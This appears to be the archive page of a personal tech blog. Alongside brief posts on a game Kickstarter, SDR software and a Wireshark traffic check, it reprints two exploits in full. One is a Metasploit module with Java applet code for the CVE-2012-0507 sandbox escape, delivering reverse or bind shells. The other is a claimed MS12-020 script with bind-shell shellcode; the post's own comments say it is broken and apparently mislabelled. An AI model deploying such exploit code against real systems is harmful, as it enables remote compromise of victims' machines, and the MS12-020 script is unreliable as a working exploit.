Wednesday, February 17, 2016

Battalion 1944

I have not been this excited about a game in a long time: a modern take on the original COD/MOH-style shooters. Sign me up.








You can back the game here:

https://www.kickstarter.com/projects/bulkheadinteractive/battalion-1944-pc-xb1-ps4

Friday, February 7, 2014

Living without a computer....

Well, my computer decided to die on me, so I am now having an impromptu exercise in living without one. Not fully, of course, since today's phones are pretty much computers. Weirdly, the only thing I really miss is the keyboard. On the bright side, I'm a lot more productive in the house and with the baby.

Sunday, August 19, 2012

Satellite & Radio Data Decoding Software

After getting my rtl-sdr USB stick I have spent a lot of time scouring the internet for different decoder software. Having found that there aren't any coherent and up-to-date lists of such software, I believe a post listing them could be useful to other people as well. This is still a work in progress, so if you know of software not on the list, please leave a comment and I will add it.


Saturday, April 14, 2012

JAVA CVE-2012-0507 Metasploit POC

Authors (as listed in the module's own metadata below): Jeroen Frijters (initial discovery), sinn3r and Juan Vazquez (Metasploit module), egypt (support for older Java versions). The sinn3r/egypt "at metasploit dot com" addresses belong to the module authors, not to Frijters or Vazquez.



 ##  
 # This file is part of the Metasploit Framework and may be subject to  
 # redistribution and commercial restrictions. Please see the Metasploit  
 # Framework web site for more information on licensing and terms of use.  
 #  http://metasploit.com/framework/  
 ##  
 require 'msf/core'  
 require 'rex'  
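 class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::EXE
      include Msf::Exploit::Remote::BrowserAutopwn

      autopwn_info({ :javascript => false })

      # Module metadata for CVE-2012-0507. The bug: a deserialized
      # AtomicReferenceArray writes through sun.misc.Unsafe with no array-store
      # check, so an applet can smuggle a differently-typed object into an
      # array slot and use it to define classes with AllPermission (see the
      # References for the public write-ups).
      def initialize( info = {} )
           super( update_info( info,
                'Name'           => 'Java AtomicReferenceArray Type Violation Vulnerability',
                'Description'    => %q{
                          This module exploits a vulnerability due to the fact that
                     AtomicReferenceArray uses the Unsafe class to store a reference in an
                     array directly, which may violate type safety if not used properly.
                     This allows a way to escape the JRE sandbox, and load additional classes
                     in order to perform malicious operations.
                },
                'License'        => MSF_LICENSE,
                'Author'         =>
                     [
                          'Jeroen Frijters', # Initial discovery according to his blog
                          'sinn3r',          # metasploit module
                          'juan vazquez',    # metasploit module
                          'egypt'            # added support for older java versions
                     ],
                'References'     =>
                     [
                          ['CVE', '2012-0507'],
                          ['OSVDB', '80724'],
                          ['BID', '52161'],
                          ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
                          ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
                          ['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],
                          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']
                     ],
                'Platform'       => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
                'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
                'Targets'        =>
                     [
                          [ 'Generic (Java Payload)',
                               {
                                    'Platform' => ['java'],
                                    'Arch'     => ARCH_JAVA,
                               }
                          ],
                          [ 'Windows x86 (Native Payload)',
                               {
                                    'Platform' => 'win',
                                    'Arch'     => ARCH_X86,
                               }
                          ],
                          [ 'Mac OS X PPC (Native Payload)',
                               {
                                    'Platform' => 'osx',
                                    'Arch'     => ARCH_PPC,
                               }
                          ],
                          [ 'Mac OS X x86 (Native Payload)',
                               {
                                    'Platform' => 'osx',
                                    'Arch'     => ARCH_X86,
                               }
                          ],
                          [ 'Linux x86 (Native Payload)',
                               {
                                    'Platform' => 'linux',
                                    'Arch'     => ARCH_X86,
                               }
                          ],
                     ],
                'DefaultTarget'  => 0,
                'DisclosureDate' => 'Feb 14 2012'
                ))
      end

      # Loads the pre-built exploit applet (data/exploits/CVE-2012-0507.jar)
      # into memory once, then lets the HttpServer mixin start serving.
      # File.binread closes the handle even when the read raises, unlike the
      # open/read/close sequence it replaces.
      def exploit
           path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" )
           @jar_data = File.binread( path )
           super
      end

      # Handles every request under the module's URI:
      #   * a request ending in ".jar" gets the static exploit jar and starts
      #     the payload handler for that client;
      #   * anything else is first redirected to the trailing-slash form (so
      #     the applet's relative archive="x.jar" resolves under this
      #     resource) and then served the applet HTML with a per-client payload.
      # Java targets ship the payload as a hex-encoded jar in the "jar" applet
      # parameter; native targets ship a hex-encoded executable in "data".
      def on_request_uri( cli, request )
           peer = "#{cli.peerhost}:#{cli.peerport}"

           if request.uri.match(/\.jar$/i)
                print_status( "#{peer} - sending jar..." )
                send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
                handler( cli )
                return
           end

           unless request.uri.match(/\/$/)
                send_redirect( cli, get_resource() + '/', '')
                return
           end

           print_status("#{peer} - Sending #{self.name}")

           # Fresh payload per client so each victim gets its own handler binding.
           payload = regenerate_payload( cli )
           unless payload
                print_error("#{peer} - Failed to generate the payload." )
                return
           end

           # Defaults match the original: empty strings (which are truthy in
           # Ruby, so generate_html still emits the <param>) and a nil jar.
           data = ""
           jar  = nil
           host = ""
           port = ""

           if target.name == 'Generic (Java Payload)'
                # FIX: the original only assigned `jar` on the LHOST (reverse)
                # branch, so a bind payload always fell through to the
                # "Failed to generate the executable" error. The encoded Java
                # payload is the jar to drop in both cases.
                jar  = payload.encoded
                port = datastore['LPORT']
                if datastore['LHOST']
                     host = datastore['LHOST']
                     vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" )
                else
                     # Bind shell: point the handler at the victim that just connected.
                     datastore['RHOST'] = cli.peerhost
                     vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." )
                end

                unless jar
                     print_error("#{peer} - Failed to generate the executable." )
                     return
                end
                print_status( "Generated jar to drop (#{jar.length} bytes)." )
                jar = Rex::Text.to_hex( jar, "" )
           else
                # The EXE mixin picks arch/platform from the selected target.
                data = generate_payload_exe
                unless data
                     print_error("#{peer} - Failed to generate the executable." )
                     return
                end
                print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." )
                data = Rex::Text.to_hex( data, "" )
           end

           send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
      end

      # Builds the 1x1 applet page. Each <param> is emitted only when its value
      # is non-nil. The values come from the operator's datastore and from
      # Rex::Text.to_hex output, not from the requesting client, which is why
      # no HTML escaping is applied here; do not feed client-controlled strings
      # into these arguments.
      def generate_html( data, jar, host, port )
           jar_name = rand_text_alpha(rand(6)+3) + ".jar"

           params = []
           params << "<param name=\"data\" value=\"#{data}\"/>"  if data
           params << "<param name=\"jar\" value=\"#{jar}\"/>"    if jar
           params << "<param name=\"lhost\" value=\"#{host}\"/>" if host
           params << "<param name=\"lport\" value=\"#{port}\"/>" if port

           "<html><head></head><body>" +
                "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">" +
                params.join +
                "</applet></body></html>"
      end

      # The jar bytes read in #exploit; served verbatim on the ".jar" request.
      def generate_jar()
           @jar_data
      end
 end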
Exploit (applet class, Exploit.java)
 package a;  
 import java.applet.Applet;  
 import java.io.ByteArrayInputStream;  
 import java.io.ObjectInputStream;  
 import java.util.concurrent.atomic.AtomicReferenceArray;  
 import a.*;  
 // Referenced classes of package a:  
 //                Help  
 /**
  * Applet side of the CVE-2012-0507 sandbox escape. init() deserializes a
  * hard-coded Java serialization stream (it starts with the ACED0005 magic)
  * holding an Object[] of two elements: a Help[] and an AtomicReferenceArray
  * whose "array" field is a back-reference (the trailing 71 00 7E 00 03) to
  * that same Help[]. Writing the applet's ClassLoader through the
  * AtomicReferenceArray therefore lands a ClassLoader in a Help[] slot without
  * an array-store check, and Help.doWork then calls defineClass on it with an
  * AllPermission ProtectionDomain.
  */
 public class Exploit extends Applet
 {
      public Exploit()
      {
      }

      /**
       * Decodes a hex string into bytes, two hex digits per output byte.
       * Assumes an even-length input: for an odd length the final iteration
       * reads charAt(i + 1) past the end and throws
       * StringIndexOutOfBoundsException. Non-hex characters are not rejected
       * (Character.digit returns -1, which is folded into the byte silently).
       */
      public static byte[] StringToBytes(String s)
      {
           byte abyte0[] = new byte[s.length() / 2];
           for(int i = 0; i < s.length(); i += 2)
                abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
           return abyte0;
      }

      /**
       * Applet entry point. Reads the "data", "jar", "lhost" and "lport"
       * parameters (written by the Metasploit module's generate_html) and
       * hands them to Help.doWork together with the type-confused reference.
       * lport defaults to 4444 when the parameter is absent; a non-numeric
       * lport makes Integer.parseInt throw. Every exception is printed to
       * stdout and swallowed; getMessage() may be null, so a failure can show
       * up as just "null".
       */
      public void init()
      {
           try
           {
                // Serialized Object[] { Help[1], AtomicReferenceArray(array -> that same Help[]) }.
                String as[] = {
                     "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003"
                };
                StringBuilder stringbuilder = new StringBuilder();
                for(int i = 0; i < as.length; i++)
                     stringbuilder.append(as[i]);
                ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));
                Object aobj[] = (Object[])(Object[])objectinputstream.readObject();
                Help ahelp[] = (Help[])(Help[])aobj[0];
                AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];
                ClassLoader classloader = getClass().getClassLoader();
                // The type confusion: set() stores via Unsafe with no array-store
                // check, so slot 0 of the Help[] now holds the ClassLoader.
                atomicreferencearray.set(0, classloader);
                // Reading the slot back through the Help[] is not re-checked by
                // the JVM; this is the read the whole technique relies on.
                Help _tmp = ahelp[0];
                String data = getParameter( "data" );
                String jar  = getParameter( "jar" );
                String lhost = getParameter( "lhost" );
                String lport = getParameter( "lport" );
                System.out.println("go go go");
                // ahelp[0] is the ClassLoader masquerading as a Help.
                Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));
           }
           catch(Exception exception) {
                System.out.println(exception.getMessage());
           }
      }
 }
Help (helper class, Help.java)
 package a;  
 import java.io.ByteArrayOutputStream;  
 import java.io.IOException;  
 import java.io.InputStream;  
 import java.io.ObjectInputStream;  
 import java.io.ObjectOutputStream;  
 import java.io.Serializable;  
 import java.net.URL;  
 import java.security.AllPermission;  
 import java.security.CodeSource;  
 import java.security.Permissions;  
 import java.security.ProtectionDomain;  
 import java.security.cert.Certificate;  
 import java.lang.reflect.Field;  
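 public class Help extends ClassLoader implements Serializable{
      /**
       * Defines msf.x.PayloadX$StreamConnector and msf.x.PayloadX from the
       * class files bundled in the applet jar, under a ProtectionDomain that
       * carries AllPermission, then instantiates PayloadX: once to fill in its
       * public data/jar/lhost/lport fields, and a second time so the payload
       * runs with those values in place. Errors are printed to stdout and
       * swallowed; the applet has no other channel to report them.
       *
       * @param h     declared as Help, but at run time the applet's own
       *              ClassLoader reached through the type-confused Help[] in
       *              Exploit.init; defineClass dispatches on that object,
       *              which is what makes the privileged domain stick
       * @param expl  the running applet, used only to locate the bundled class files
       * @param data  hex-encoded native payload ("" for Java targets per the module)
       * @param jar   hex-encoded Java payload jar (null for native targets)
       * @param lhost handler host for reverse payloads ("" for bind payloads)
       * @param lport handler port
       */
      public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {
           String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };
           String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };
           Class cls = null;
           try
           {
                // One fully-privileged domain serves every class defined below
                // (the original rebuilt it on each loop iteration).
                URL url = new URL( "file:///" );
                Certificate[] certs = new Certificate[0];
                Permissions perm = new Permissions();
                perm.add( new AllPermission() );
                ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );

                for( int index=0 ; index<classNames.length ; index++ )
                {
                     // FIX: the original never closed the resource stream and
                     // would NPE on a missing resource; readResource does both.
                     byte[] bytecode = readResource( expl, classPaths[index] );
                     // Dispatches on the real runtime type of h (see @param h).
                     cls = h.defineClass( classNames[index], bytecode, 0, bytecode.length, pd );
                     // FIX: the original printed cls.getClass().getName(), which is
                     // always "java.lang.Class"; the defined class's name is useful.
                     System.out.println("Defined class: " + cls.getName());
                }
                // cls is now the last class defined, i.e. msf.x.PayloadX.
                if( cls != null )
                {
                     Field payload_data  = cls.getField( "data" );
                     Field payload_jar   = cls.getField( "jar" );
                     Field payload_lhost = cls.getField( "lhost" );
                     Field payload_lport = cls.getField( "lport" );
                     // First instance exists only so the public fields can be set.
                     Object obj = cls.newInstance();
                     payload_data.set( obj, data );
                     payload_jar.set( obj, jar );
                     payload_lhost.set( obj, lhost );
                     payload_lport.setInt( obj, lport );
                     // Second instance performs the actual payload.
                     // NOTE(review): how PayloadX's constructor sees the values set
                     // on the first instance is not visible here (static fields
                     // would explain it) -- confirm against PayloadX's source.
                     obj = cls.newInstance();
                }
           }
           catch( Exception e ) {
                // FIX: print the exception itself; getMessage() is often null
                // (NullPointerException, for one), which hid the failure cause.
                System.out.println(e);
           }
      }

      /**
       * Reads a classpath resource relative to the applet's class into a byte
       * array, always closing the stream.
       *
       * @throws IOException if the resource is missing or cannot be read
       */
      private static byte[] readResource( Exploit expl, String path ) throws IOException {
           InputStream is = expl.getClass().getResourceAsStream( path );
           if( is == null )
                throw new IOException( "resource not found: " + path );
           try {
                ByteArrayOutputStream bos = new ByteArrayOutputStream();
                byte[] buffer = new byte[8192];
                int length;
                while( ( length = is.read( buffer ) ) > 0 )
                     bos.write( buffer, 0, length );
                return bos.toByteArray();
           } finally {
                is.close();
           }
      }
 }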

CSI:NY Guide to xbox360 game hacking



Thursday, April 12, 2012

What the hell is downloading all that stuff under netsvcs?

I like to play online games, and just about nothing is as annoying as lag during those games. What makes it worse is lag caused by a download you can't identify. So I was playing a game in my free time when, all of a sudden, my ping times jumped to 999 ms. Naturally I looked at my connections and saw that the process with PID 428 was downloading something. A quick look in Task Manager showed that 428 was netsvcs. That alone doesn't identify the culprit: netsvcs is an svchost.exe service group, so several services share that PID, and you need something like `tasklist /svc` or Process Explorer to see which services it hosts. Nor does the remote side help much: the data was coming from 92.123.155.59, which RIPE shows as owned by Akamai Technologies, and since Akamai is a CDN that tells you who is hosting the file, not who asked for it. I don't remember installing, and couldn't find by a quick search, anything on my computer by Akamai.

Enter Wireshark: filter on the IP address and immediately we see the following:
33378 739.213642 192.168.0.149 92.123.155.59 HTTP 335 GET /pub/adobe/reader/win/10.x/10.1.0/en_US/AdbeRdr1010_en_US.msi HTTP/1.1 

So yes, a pointless post most likely; I just wish companies that ship auto-updaters would clearly show when they are downloading, and what. If Adobe had had a clearly labelled updater in the task list I wouldn't have had to go through all that just to find out that Acrobat Reader was downloading an update. But in one respect it was a good thing: I no longer have Acrobat Reader on my desktop computer, since it has been replaced by Foxit Reader.

Monday, March 19, 2012

MS12-020 Exploit POC

*WARNING* I have not tried this myself, so caution is advised — as always when dealing with shellcode you did not write. Reading the script as pasted, it cannot run at all: `Thread` is never imported, `rdp` (used in `__DCEPacket`) and `self.__dce` (used in `run`) are never defined, `print '[-]connected' % self.target` has no format specifier and would raise, the `__main__` block's mixed 7/8-space indentation is a syntax error, and even with that fixed it calls `sys.exit(-1)` unconditionally before the exploit object is created. The class name `SRVSVC_Exploit` and the `call(0x1f, ...)` stub look like a DCERPC/SRVSVC-style exploit skeleton rather than anything RDP-specific. Treat it as an unverified paste, not as a working MS12-020 exploit; do not run the embedded shellcode on anything you care about without analysing it first.

#!/usr/bin/env python
#
#   MS12-020 Exploit (unverified; see warning above)
#
#   Uses FreeRDP
#
 
import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import  rdpNego
 
# bind shellcode TCP port 4444 (per the original comment -- not verified here;
# the 16 leading 0x90 bytes are a NOP sled, the rest is opaque machine code
# that should be disassembled before anyone runs this)
shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'

# Payload. Opens with '\x41\x00\x5c\x00' (UTF-16LE "A\"); after the short stub
# on the next line every byte is in the printable-ASCII range, which looks like
# an alphanumeric-encoded stage. Neither observation has been verified by
# actually decoding it.
payload  = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';
 
# NOTE(review): this class cannot run as pasted. `Thread` is never imported
# (only struct, sys and the freerdp names are), `rdp` in __DCEPacket is not
# defined anywhere in the script, and `self.__dce` used in run() is never
# assigned. The class name and the call(0x1f, ...) stub look like a
# DCERPC/SRVSVC-style exploit skeleton rather than anything RDP-specific;
# nothing here should be taken as a verified MS12-020 trigger.
class SRVSVC_Exploit(Thread):
    # target: host to connect to; port defaults to 3389 but is stored in
    # self.__port and never used by the connection code below.
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
 
    # Builds self.__stub (the request body). The "connect" lines reference an
    # undefined `rdp` name, and the "connected" print has no %s placeholder,
    # so `% self.target` raises TypeError before the stub is even built.
    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target
 
        # Making teh packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
        return
 
    # Thread body: self.__dce is never set anywhere, so this would raise
    # AttributeError even if __DCEPacket succeeded. The success message is
    # printed unconditionally, without checking any response.
    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'
 
# NOTE(review): the body of this `if` mixes 7- and 8-space indentation, which
# is an IndentationError in Python; and even with that fixed, sys.exit(-1)
# runs unconditionally, so the two statements after the block are never
# reached. The usage/exit was presumably meant to sit under an argument-count
# check such as `if len(sys.argv) < 2:` -- not visible here.
if __name__ == '__main__':
       target = sys.argv[1]
       print '\nUsage: %s  \n' % sys.argv[0]
        sys.exit(-1)

# Unreachable as written (see above).
current = SRVSVC_Exploit(target)
current.start()